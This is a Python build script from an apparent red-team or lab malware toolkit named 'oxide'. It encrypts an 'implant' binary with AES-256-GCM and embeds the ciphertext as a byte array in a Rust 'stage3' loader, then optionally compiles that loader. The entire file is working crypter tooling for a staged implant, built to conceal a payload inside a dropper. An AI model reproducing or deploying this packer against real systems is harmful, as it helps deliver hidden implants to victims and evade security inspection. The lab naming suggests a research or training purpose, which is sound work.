#!/usr/bin/env python3
"""
builder.py -- Embed encrypted implant into stage3.

Usage:
  python3 builder.py \\
    --implant path/to/oxide-implant \\
    --psk oxide-lab-psk \\
    --salt $(cat ../oxide/certs/salt.hex) \\
    [--out-rs stage3/src/payload.rs] \\
    [--rebuild] [--dry-run]

Encryption: AES-256-GCM with key derived via PBKDF2-HMAC-SHA256.
Parameters match oxide-shared constants (PBKDF2_ITERATIONS=600_000, AES_KEY_SIZE=32).
"""
import argparse
import hashlib
import os
import subprocess
import sys
from pathlib import Path

PBKDF2_ITERATIONS = 600_000
AES_KEY_SIZE = 32
NONCE_SIZE = 12


def derive_key(psk: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac(
        "sha256", psk.encode(), salt, PBKDF2_ITERATIONS, dklen=AES_KEY_SIZE
    )


def encrypt_aes_gcm(key: bytes, plaintext: bytes) -> bytes:
    try:
        from cryptography.hazmat.primitives.ciphers.aead import AESGCM
    except ImportError:
        sys.exit("[!] pip install cryptography")
    nonce = os.urandom(NONCE_SIZE)
    return nonce + AESGCM(key).encrypt(nonce, plaintext, None)


def to_rust_bytes(data: bytes) -> str:
    hex_bytes = ", ".join(f"0x{b:02x}" for b in data)
    return (
        "// Generated by builder.py -- do not edit manually\n"
        f"pub static ENCRYPTED_IMPLANT: &[u8] = &[{hex_bytes}];\n"
    )


def main():
    p = argparse.ArgumentParser(description="Embed encrypted implant into stage3")
    p.add_argument("--implant", required=True, help="path to oxide-implant binary")
    p.add_argument("--psk", default="oxide-lab-psk")
    p.add_argument("--salt", required=True, help="hex-encoded 32-byte salt")
    p.add_argument("--out-rs", default="stage3/src/payload.rs")
    p.add_argument("--rebuild", action="store_true", help="run cargo build --release in stage3/")
    p.add_argument("--dry-run", action="store_true", help="write payload.rs but skip cargo build")
    args = p.parse_args()

    implant_path = Path(args.implant)
    if not implant_path.exists():
        sys.exit(f"[!] implant not found: {implant_path}")

    salt = bytes.fromhex(args.salt)
    if len(salt) != 32:
        sys.exit(f"[!] salt must be 32 bytes, got {len(salt)}")

    print(f"[*] Reading {implant_path} ({implant_path.stat().st_size} bytes)")
    plaintext = implant_path.read_bytes()

    print("[*] Deriving key via PBKDF2-HMAC-SHA256 (600,000 iterations)...")
    key = derive_key(args.psk, salt)

    print("[*] Encrypting with AES-256-GCM...")
    ciphertext = encrypt_aes_gcm(key, plaintext)
    print(f"[+] Encrypted: {len(ciphertext)} bytes")

    out_rs = Path(args.out_rs)
    out_rs.parent.mkdir(parents=True, exist_ok=True)
    out_rs.write_text(to_rust_bytes(ciphertext))
    print(f"[+] Wrote {out_rs}")

    if args.dry_run:
        print("[*] Dry run -- skipping rebuild")
        return

    if args.rebuild:
        stage3_dir = out_rs.parent.parent
        print(f"[*] Building stage3 in {stage3_dir}...")
        r = subprocess.run(["cargo", "build", "--release"], cwd=stage3_dir)
        if r.returncode != 0:
            sys.exit("[!] cargo build failed")
        print("[+] stage3 built")


if __name__ == "__main__":
    main()
